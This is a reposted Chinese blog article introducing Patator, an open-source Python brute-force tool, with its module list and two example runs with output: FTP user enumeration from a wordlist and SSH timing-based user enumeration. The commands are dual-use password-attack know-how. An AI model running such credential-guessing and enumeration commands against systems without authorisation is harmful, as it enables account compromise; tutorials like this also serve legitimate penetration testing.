基於Python的多執行緒爆破小工具!誰用誰就知道它有多屌了!
阿新 • • 發佈:2018-11-19
0×0 背景
進群:548377875 就可以獲取數十套小編精心準備的PDF以及零基礎到進階的教程!
Patator是出於對使用Hydra,Medusa,Ncrack,Metasploit模組和Nmap NSE指令碼進行密碼猜測攻擊而感到失望後, 選擇了不同的方法編寫另一個暴力破解工具避免重複相同的缺點。 Patator是一個用Python編寫的多執行緒工具,它比其他前輩更加可靠和靈活。
下載地址:https://github.com/lanjelot/patator
目前它支援以下模組:
* ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * finger_lookup : Enumerate valid users using Finger * http_fuzz : Brute-force HTTP/HTTPS * rdp_gateway : Brute-force RDP Gateway * ajp_fuzz : Brute-force AJP * pop_login : Brute-force POP * pop_passd : Brute-force poppassd (not POP3) * imap_login : Brute-force IMAP * ldap_login : Brute-force LDAP * smb_login : Brute-force SMB * smb_lookupsid : Brute-force SMB SID-lookup * rlogin_login : Brute-force rlogin * vmauthd_login : Brute-force VMware Authentication Daemon * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * mysql_query : Brute-force MySQL queries * rdp_login : Brute-force RDP (NLA) * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Brute-force DNS * dns_reverse : Brute-force DNS (reverse lookup subnets) * ike_enum : Enumerate IKE transforms * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files * sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases * umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
0×1 使用
FTP:Enumerating users denied login in vsftpd/userlis
$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500 19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT 19:36:06 patator INFO - 19:36:06 patator INFO - code size time | candidate | num | mesg 19:36:06 patator INFO - ----------------------------------------------------------------------------- 19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful. 19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful. 19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied. 19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied. 19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied. ...
SSH:Time-based user enumeration
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3 17:45:20 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT 17:45:20 patator INFO - 17:45:20 patator INFO - code size time | candidate | num | mesg 17:45:20 patator INFO - ----------------------------------------------------------------------------- 17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | <class '__main__.TimeoutError'> timed out 17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | <class '__main__.TimeoutError'> timed out 17:45:37 patator FAIL - xxx 41 10.000 | joe | 40 | <class '__main__.TimeoutError'> timed out ...
0×2 體驗
*本文作者:si1ence,轉載請註明來自FreeBuf.COM